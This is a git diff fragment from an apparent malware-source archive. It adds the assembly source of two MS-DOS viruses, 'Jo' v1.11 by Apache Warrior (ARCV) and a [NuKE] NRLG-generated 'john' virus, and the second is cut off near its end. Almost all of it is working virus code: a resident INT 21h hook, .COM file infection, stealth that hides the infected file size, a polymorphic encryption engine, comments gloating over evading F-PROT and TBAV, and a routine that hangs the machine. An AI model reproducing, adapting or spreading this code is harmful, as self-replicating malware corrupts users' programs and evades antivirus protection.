ptr cs:[si+int21+2],cx ; + cmp byte ptr es:[0],5ah ; Check for Start of MCB + jne oldprog ; If no then quit + mov ax,es:[3] ; Play with MCB to get top of + sub ax,0bch ; Memory and reserve 3,008 bytes + jb oldprog ; for Virus + mov es:[3],ax ; + sub word ptr es:[12h],0bch ; + mov es,es:[12h] ; + push ds ; + push cs ; + pop ds ; Move Virus into Memory + mov di,0100h ; space allocated above + mov cx,len+5 ; + push si ; + add si,0100h ; + rep movsb ; + pop si + pop ds + cli ; Stop Interrupts Very Inportant + mov ax,offset new21 ; Load New Int 21h handler + mov word ptr ds:int_21ofs,ax ; address and store + mov word ptr ds:int_21seg,es ; + sti ; + +oldprog: + mov di,0100h ; Return to Orginal + pop es ; Program.. + pop ds ; + push di ; + ret ; + +int21 dd 0h ; Storage For Int 21h Address + +; +; New interupt 21h Handler +; + +sayitis: mov ax,42a1h ; Install Check.. + iret + +new21: ;nop ; Sign byte + cmp ax,0ffa4h ; Instalation Check + je sayitis + cmp ah,11h ; FCB Search file + je adjust_FCB + cmp ah,12h ; FCB Search Again + je adjust_FCB + cmp ah,4eh ; Handle Search file + je adjust_FCB + cmp ah,4fh ; Handle Search Again + je adjust_FCB + cmp ah,3dh ; Are they opening a file? + je intgo ; if no ignore + cmp ah,4bh ; Exec Function + jne noint +intgo: push ax ; 4bh, 3dh Infect file + push bx ; Handler save the Registers + push cx + push es + push si + push di + push dx + push ds + call checkit ; Call infect routine + pop ds + pop dx + pop di + pop si + pop es + pop cx + pop bx + pop ax +noint: jmp cs:[int21] ; Return to Orginal Int 21h + +adjust_FCB: push es ; Stealth Routine + push bx + push si + push ax + xor si,si + and ah,40h ; Check for handle Search + jz okFCB + mov si,1 ; Set flag +okFCB: mov ah,2fh ; Get DTA Address + int 21h + pop ax ; Restore ax to orginal function + call i21 ; value call it + pushf ; save flags + push ax ; save ax error code + call adjust ; Call stealth adjust routine + pop ax ; restore registers + popf + pop si + pop bx + pop es + retf 2 ; Return to caller + +adjust: pushf ; Stealth check routine + cmp si,0 ; Check flag set earlyer + je fcb1 + popf + jc repurn ; Check for Handle Search error + mov ah,byte ptr es:[bx+16h] ; No error then carry on + and ah,01ah ; Check stealth stamp + cmp ah,01ah ; + jne repurn ; + sub word ptr es:[bx+1ah],len ; Infected then take the viri size +repurn: ret ; from file size. +fcb1: popf ; Same again but for the FCB + cmp al,0ffh + je meat_hook + cmp byte ptr es:[bx],0ffh + jne xx2 + add bx,7 +xx2: mov ah,byte ptr es:[bx+17h] + and ah,01ah + cmp ah,01ah + jne meat_hook + sub word ptr es:[bx+1dh],len +meat_hook: ret + +com_txt db 'COM',0 ; + +reset: ; File Attrib routines + mov cx,20h +set_back: + mov al,01h +find_att: + mov ah,43h ; Alter file attributes +i21: pushf + call cs:[int21] +exitsub: ret + +checkit: ; Infect routine + push es ; Save some more registers + push ds + push ds ; Check to see if file is a + pop es ; .COM file if not then + push dx ; quit.. + pop di ; + mov cx,0ffh ; Find '.' in File Name + mov al,'.' ; + repnz scasb ; + push cs ; + pop ds ; + mov si,offset com_txt ; Compare with COM extension + mov cx,3 ; + rep cmpsb ; + pop ds ; Restore Reg... + pop es ; + jnz exitsub ; + +foundtype: sub di,06h ; Check for commaND.com + cmp ds:[di],'DN' ; Quit if found.. + je exitsub ; + mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later + mov word ptr cs:[nameptr+2],ds ; + mov al,00h ; Find Attributes of file to infect + call find_att ; + jc exitsub ; Error Quit. + +alteratr: mov cs:[attrib],cx ; Save them + call reset ; Reset them to normal + + mov ax,3d02h ; Open file + call i21 + jc exitsub ; Error Quit + push cs ; Set DS to CS + pop ds ; + mov ds:[handle],ax ; Store handle + + mov ax,5700h ; Read file time and date + mov bx,ds:[handle] ; + call i21 ; +ke9: mov ds:[date],dx ; Save DX + or cx,1ah ; Set Stealth Stamp + mov ds:[time],cx ; Save CX + + mov ah,3fh ; Read in first 5 bytes + mov cx,05h ; To save them + mov dx,offset oldstart ; + call i21 ; +closeit: jc close2 ; Error Quit + + mov ax,4202h ; Move filepointer to end + mov cx,0ffffh ; -5 bytes offset from end + mov dx,0fffbh ; + call i21 ; + jc close ; Error Quit + + mov word ptr cs:si_val,ax ; Save File saize for later + cmp ax,0ea60h ; See if too big + jae close ; Yes then Quit + + mov ah,3fh ; Read in last 5 bytes + mov cx,05h ; + mov dx,offset tempmem ; + call i21 ; + jc close ; Error + + push cs ; Reset ES to CS + pop es ; + mov di,offset tempmem ; Check if Already infected + mov si,offset string ; + mov cx,5 ; + rep cmpsb ; + jz close ; Yes the Close and Quit + +zapfile: ; No Infect and Be Damned + mov ax,word ptr cs:si_val ; + add ax,2 ; + push cs ; + pop ds ; + mov word ptr ds:[jpover+1],ax ; Setup new jump + call mut_eng ; Call Mutation Engine + mov ah,40h ; Save prog to end of file + mov bx,cs:[handle] ; Load Handle + mov cx,length ; LENGTH OF PROGRAM**** + call i21 ; Write away +close2: jc close ; Quit if error + + push cs ; Reset DS to CS + pop ds ; + mov ax,4200h ; Move File pointer to start + xor cx,cx ; of file + cwd ; Clever way to XOR DX,DX + call i21 ; + jc close ; Error Quit.. + + mov ah,40h ; Save new start + mov cx,03h ; + mov dx,offset jpover ; + call i21 ; + +close: mov ax,5701h ; Restore Time and Date + mov bx,ds:[handle] ; + mov cx,ds:[time] ; + mov dx,ds:[date] ; + call i21 ; + mov ah,3eh ; Close file + call i21 ; +exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they where + mov cx,ds:[attrib] ; + mov ds,word ptr cs:[nameptr+2] ; + call set_back ; + ret ; Return to INT 21h Handler + + +; +; CyberTech Mutation Engine +; +; This is Version Two of the Mutation Engine +; Unlike others it is very much Virus Specific.. Works +; Best on Resident Viruses.. +; +; To Call +; +; si_val = File Size +; +; Returns +; DS:DX = Encrypted Virus Code, Use DS:DX pointer to +; Write From.. + + +mut_eng: + mov ah,2ch ; Get Time + call i21 ; + mov word ptr ds:[switch],dx ; Use Sec./100th counter as key + mov word ptr ds:[switch2+1],dx ; Save to Decrypt and Encrypt + mov ax,cs:[si_val] ; Get file size + mov dx,offset main2 ; + add ax,dx ; + mov word ptr [main+1],ax ; Store to Decrypt offset + xor byte ptr [loop_1+2],28h ; Toggle Add/Sub + xor byte ptr switch2,28h ; " + push cs ; Reset Segment Regs. + pop ds ; + push cs ; + pop ax ; Find Spare Segment + sub ax,0bch ; and put in es + mov es,ax ; + mov si,offset main ; Move Decrypt function + mov di,0100h ; + mov cx,decryptlen ; + rep movsb ; + mov si,offset main2 ; Start the code encrypt + mov cx,virlen ; +loop_10: lodsw ; +switch2: add ax,0000 ; + stosw ; + loop loop_10 ; + mov si,offset string ; move ID string to end + mov cx,5 ; new code + rep movsb ; + mov dx,0100h ; Set Registers to encrypted Virus + push es ; Location + pop ds ; + ret ; Return + +; Data Section, contains Messages etc. + + +; Little message to the Wife to Be.. + +msg db 'Looking Good Slimline Joanna.',0dh,0ah + db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah + db 'Jo Ver. 1.11 (c) Apache Warrior 92.',0dh,0ah + db '$' + +msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$' + +virus_name db '[JO]',00h, ; Virus Name.. +author db 'By Apache Warrior, ARCV Pres.' ; Thats me.. +filler dd 0h + +oldstart: mov ax,4c00h ; Orginal program start + int 21h + nop + nop + +j100h dd 0100h ; Stores for jumps etc +jpover db 0e9h,00,00h ; + +string db '65fd3' ; ID String + +heap: ; This code is not saved +handle dw 0h +nameptr dd 0h +attrib dw 0h +date dw 0h +time dw 0h +tempmem db 10h dup (?) +findat db 0h +si_val dw 0h + +code ends + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.jo_v111.asm b/MSDOS/Virus.MSDOS.Unknown.jo_v111.asm new file mode 100644 index 00000000..9e810efd --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jo_v111.asm @@ -0,0 +1,429 @@ + NAME Jo + PAGE 55,132 + TITLE Jo Virus. + +; +; This is Yet another virus from the ARCV, this one is called +; Joanna, it was written by Apache Warrior, ARCV President. +; +; It has Stealth features, it is a Resident infector of .COM files +; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for +; its Polymorphic features. There is a maximum of 3 unchanged bytes +; in the Encrypted code. +; + +.model tiny + +code segment + + ASSUME CS:CODE,DS:CODE,ES:CODE + +int_21ofs equ 84h +int_21seg equ 86h +length equ offset handle-offset main +msglen equ offset oldstart-offset msg +tsrlen equ (offset findat-offset main)/10 +len equ offset handle-offset main +virlen equ (offset string-offset main2)/2 +decryptlen equ offset main2-offset main + + org 100h + +start: jmp main + db 0,0,0 + +main: mov si,offset main2 ; SI offset for decrypt + mov cx,virlen ; viri decrypt size +loop_1: + db 2eh,81h,2ch ; decrypt +switch: dw 0 + add si,02h + dec cx + jnz loop_1 +main2: call findoff ; find file ofset +findoff: pop si ; + sub si,offset findoff + push ds + push es + push cs + pop ds + push cs + pop es + mov ax,0ff05h ; Test for Scythe2 Boot + int 13h + cmp ah,0e9h ; Check for Scythe2 Boot + jnz haha ; no go on + mov ah,09h ; Display message + lea dx,[si+offset msg2] + int 21h + jmp $ ; Crash the machine +haha: mov ah,2ah ; Date Test + int 21h ; + cmp dx,1210h ; Is month the Oct. + jnz main3 ; no go on + mov ah,09h ; Display Message + lea dx,[si+offset msg] + int 21h + + +main3: mov di,0100h ; move old programs + push si ; start back to the start + mov ax,offset oldstart ; + add si,ax ; + mov cx,05h ; + cld ; + repz movsb ; + +inst: mov ax,0ffa4h ; check to see if already instaled + int 21h + pop si ; bring back si + cmp ax,42a1h + je oldprog ; Yes return to old program + +tt2: xor ax,ax ; Residency Routine + push ax + mov ax,ds ; Get MCB segment Address + dec ax ; + mov es,ax ; Put MCB segment Address in es + pop ds ; + mov ax,word ptr ds:int_21ofs ; Load Int 21h address data + mov cx,word ptr ds:int_21seg ; + mov word ptr cs:[si+int21],ax ; Move Int 21h data to store + mov word ptr cs:[si+int21+2],cx ; + cmp byte ptr es:[0],5ah ; Check for Start of MCB + jne oldprog ; If no then quit + mov ax,es:[3] ; Play with MCB to get top of + sub ax,0bch ; Memory and reserve 3,008 bytes + jb oldprog ; for Virus + mov es:[3],ax ; + sub word ptr es:[12h],0bch ; + mov es,es:[12h] ; + push ds ; + push cs ; + pop ds ; Move Virus into Memory + mov di,0100h ; space allocated above + mov cx,len+5 ; + push si ; + add si,0100h ; + rep movsb ; + pop si + pop ds + cli ; Stop Interrupts Very Inportant + mov ax,offset new21 ; Load New Int 21h handler + mov word ptr ds:int_21ofs,ax ; address and store + mov word ptr ds:int_21seg,es ; + sti ; + +oldprog: + mov di,0100h ; Return to Orginal + pop es ; Program.. + pop ds ; + push di ; + ret ; + +int21 dd 0h ; Storage For Int 21h Address + +; +; New interupt 21h Handler +; + +sayitis: mov ax,42a1h ; Install Check.. + iret + +new21: ;nop ; Sign byte + cmp ax,0ffa4h ; Instalation Check + je sayitis + cmp ah,11h ; FCB Search file + je adjust_FCB + cmp ah,12h ; FCB Search Again + je adjust_FCB + cmp ah,4eh ; Handle Search file + je adjust_FCB + cmp ah,4fh ; Handle Search Again + je adjust_FCB + cmp ah,3dh ; Are they opening a file? + je intgo ; if no ignore + cmp ah,4bh ; Exec Function + jne noint +intgo: push ax ; 4bh, 3dh Infect file + push bx ; Handler save the Registers + push cx + push es + push si + push di + push dx + push ds + call checkit ; Call infect routine + pop ds + pop dx + pop di + pop si + pop es + pop cx + pop bx + pop ax +noint: jmp cs:[int21] ; Return to Orginal Int 21h + +adjust_FCB: push es ; Stealth Routine + push bx + push si + push ax + xor si,si + and ah,40h ; Check for handle Search + jz okFCB + mov si,1 ; Set flag +okFCB: mov ah,2fh ; Get DTA Address + int 21h + pop ax ; Restore ax to orginal function + call i21 ; value call it + pushf ; save flags + push ax ; save ax error code + call adjust ; Call stealth adjust routine + pop ax ; restore registers + popf + pop si + pop bx + pop es + retf 2 ; Return to caller + +adjust: pushf ; Stealth check routine + cmp si,0 ; Check flag set earlyer + je fcb1 + popf + jc repurn ; Check for Handle Search error + mov ah,byte ptr es:[bx+16h] ; No error then carry on + and ah,01ah ; Check stealth stamp + cmp ah,01ah ; + jne repurn ; + sub word ptr es:[bx+1ah],len ; Infected then take the viri size +repurn: ret ; from file size. +fcb1: popf ; Same again but for the FCB + cmp al,0ffh + je meat_hook + cmp byte ptr es:[bx],0ffh + jne xx2 + add bx,7 +xx2: mov ah,byte ptr es:[bx+17h] + and ah,01ah + cmp ah,01ah + jne meat_hook + sub word ptr es:[bx+1dh],len +meat_hook: ret + +com_txt db 'COM',0 ; + +reset: ; File Attrib routines + mov cx,20h +set_back: + mov al,01h +find_att: + mov ah,43h ; Alter file attributes +i21: pushf + call cs:[int21] +exitsub: ret + +checkit: ; Infect routine + push es ; Save some more registers + push ds + push ds ; Check to see if file is a + pop es ; .COM file if not then + push dx ; quit.. + pop di ; + mov cx,0ffh ; Find '.' in File Name + mov al,'.' ; + repnz scasb ; + push cs ; + pop ds ; + mov si,offset com_txt ; Compare with COM extension + mov cx,3 ; + rep cmpsb ; + pop ds ; Restore Reg... + pop es ; + jnz exitsub ; + +foundtype: sub di,06h ; Check for commaND.com + cmp ds:[di],'DN' ; Quit if found.. + je exitsub ; + mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later + mov word ptr cs:[nameptr+2],ds ; + mov al,00h ; Find Attributes of file to infect + call find_att ; + jc exitsub ; Error Quit. + +alteratr: mov cs:[attrib],cx ; Save them + call reset ; Reset them to normal + + mov ax,3d02h ; Open file + call i21 + jc exitsub ; Error Quit + push cs ; Set DS to CS + pop ds ; + mov ds:[handle],ax ; Store handle + + mov ax,5700h ; Read file time and date + mov bx,ds:[handle] ; + call i21 ; +ke9: mov ds:[date],dx ; Save DX + or cx,1ah ; Set Stealth Stamp + mov ds:[time],cx ; Save CX + + mov ah,3fh ; Read in first 5 bytes + mov cx,05h ; To save them + mov dx,offset oldstart ; + call i21 ; +closeit: jc close2 ; Error Quit + + mov ax,4202h ; Move filepointer to end + mov cx,0ffffh ; -5 bytes offset from end + mov dx,0fffbh ; + call i21 ; + jc close ; Error Quit + + mov word ptr cs:si_val,ax ; Save File saize for later + cmp ax,0ea60h ; See if too big + jae close ; Yes then Quit + + mov ah,3fh ; Read in last 5 bytes + mov cx,05h ; + mov dx,offset tempmem ; + call i21 ; + jc close ; Error + + push cs ; Reset ES to CS + pop es ; + mov di,offset tempmem ; Check if Already infected + mov si,offset string ; + mov cx,5 ; + rep cmpsb ; + jz close ; Yes the Close and Quit + +zapfile: ; No Infect and Be Damned + mov ax,word ptr cs:si_val ; + add ax,2 ; + push cs ; + pop ds ; + mov word ptr ds:[jpover+1],ax ; Setup new jump + call mut_eng ; Call Mutation Engine + mov ah,40h ; Save prog to end of file + mov bx,cs:[handle] ; Load Handle + mov cx,length ; LENGTH OF PROGRAM**** + call i21 ; Write away +close2: jc close ; Quit if error + + push cs ; Reset DS to CS + pop ds ; + mov ax,4200h ; Move File pointer to start + xor cx,cx ; of file + cwd ; Clever way to XOR DX,DX + call i21 ; + jc close ; Error Quit.. + + mov ah,40h ; Save new start + mov cx,03h ; + mov dx,offset jpover ; + call i21 ; + +close: mov ax,5701h ; Restore Time and Date + mov bx,ds:[handle] ; + mov cx,ds:[time] ; + mov dx,ds:[date] ; + call i21 ; + mov ah,3eh ; Close file + call i21 ; +exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they where + mov cx,ds:[attrib] ; + mov ds,word ptr cs:[nameptr+2] ; + call set_back ; + ret ; Return to INT 21h Handler + + +; +; CyberTech Mutation Engine +; +; This is Version Two of the Mutation Engine +; Unlike others it is very much Virus Specific.. Works +; Best on Resident Viruses.. +; +; To Call +; +; si_val = File Size +; +; Returns +; DS:DX = Encrypted Virus Code, Use DS:DX pointer to +; Write From.. + + +mut_eng: + mov ah,2ch ; Get Time + call i21 ; + mov word ptr ds:[switch],dx ; Use Sec./100th counter as key + mov word ptr ds:[switch2+1],dx ; Save to Decrypt and Encrypt + mov ax,cs:[si_val] ; Get file size + mov dx,offset main2 ; + add ax,dx ; + mov word ptr [main+1],ax ; Store to Decrypt offset + xor byte ptr [loop_1+2],28h ; Toggle Add/Sub + xor byte ptr switch2,28h ; " + push cs ; Reset Segment Regs. + pop ds ; + push cs ; + pop ax ; Find Spare Segment + sub ax,0bch ; and put in es + mov es,ax ; + mov si,offset main ; Move Decrypt function + mov di,0100h ; + mov cx,decryptlen ; + rep movsb ; + mov si,offset main2 ; Start the code encrypt + mov cx,virlen ; +loop_10: lodsw ; +switch2: add ax,0000 ; + stosw ; + loop loop_10 ; + mov si,offset string ; move ID string to end + mov cx,5 ; new code + rep movsb ; + mov dx,0100h ; Set Registers to encrypted Virus + push es ; Location + pop ds ; + ret ; Return + +; Data Section, contains Messages etc. + + +; Little message to the Wife to Be.. + +msg db 'Looking Good Slimline Joanna.',0dh,0ah + db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah + db 'Jo Ver. 1.11 (c) Apache Warrior 92.',0dh,0ah + db '$' + +msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$' + +virus_name db '[JO]',00h, ; Virus Name.. +author db 'By Apache Warrior, ARCV Pres.' ; Thats me.. +filler dd 0h + +oldstart: mov ax,4c00h ; Orginal program start + int 21h + nop + nop + +j100h dd 0100h ; Stores for jumps etc +jpover db 0e9h,00,00h ; + +string db '65fd3' ; ID String + +:heap ; This code is not saved +handle dw 0h +nameptr dd 0h +attrib dw 0h +date dw 0h +time dw 0h +tempmem db 10h dup (?) +findat db 0h +si_val dw 0h + +code ends + +end start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.john.asm b/MSDOS/Virus.MSDOS.Unknown.john.asm new file mode 100644 index 00000000..419d782a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.john.asm @@ -0,0 +1,459 @@ +;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR +;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ +;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR +;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ +;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR +;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +ÿsub byte ptr [di],07dh +add byte ptr [di],0d5h +not byte ptr [di] +add byte ptr [di],035h +sub byte ptr [di],022h +not byte ptr [di] +add byte ptr [di],034h +add byte ptr [di],012h +inc byte ptr [di] +sub byte ptr [di],0e8h +add word ptr [di],08522h +xor byte ptr [di],058h +inc word ptr [di] +ÿinc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +ÿ;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +ÿdec word ptr [di] +xor byte ptr [di],058h +sub word ptr [di],08522h +add byte ptr [di],0e8h +dec byte ptr [di] +sub byte ptr [di],012h +sub byte ptr [di],034h +not byte ptr [di] +add byte ptr [di],022h +sub byte ptr [di],035h +not byte ptr [di] +sub byte ptr [di],0d5h +add byte ptr [di],07dh +ÿinc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +ÿ;--------------------------------- +action: ;Call label +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov AH,9 ;yeah!! +MOV DX,OFFSET PAO ;print my text! +INT 21H ;now! +INT 20H ;an finsh te program +NO_DAY: ;label to incorrect date +ret ;return from call +;--------------------------------- + +ÿ +PAO: +DB 10,13,'you are infected with john virus ver 1.0a','$' + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +ÿaction_dia Db 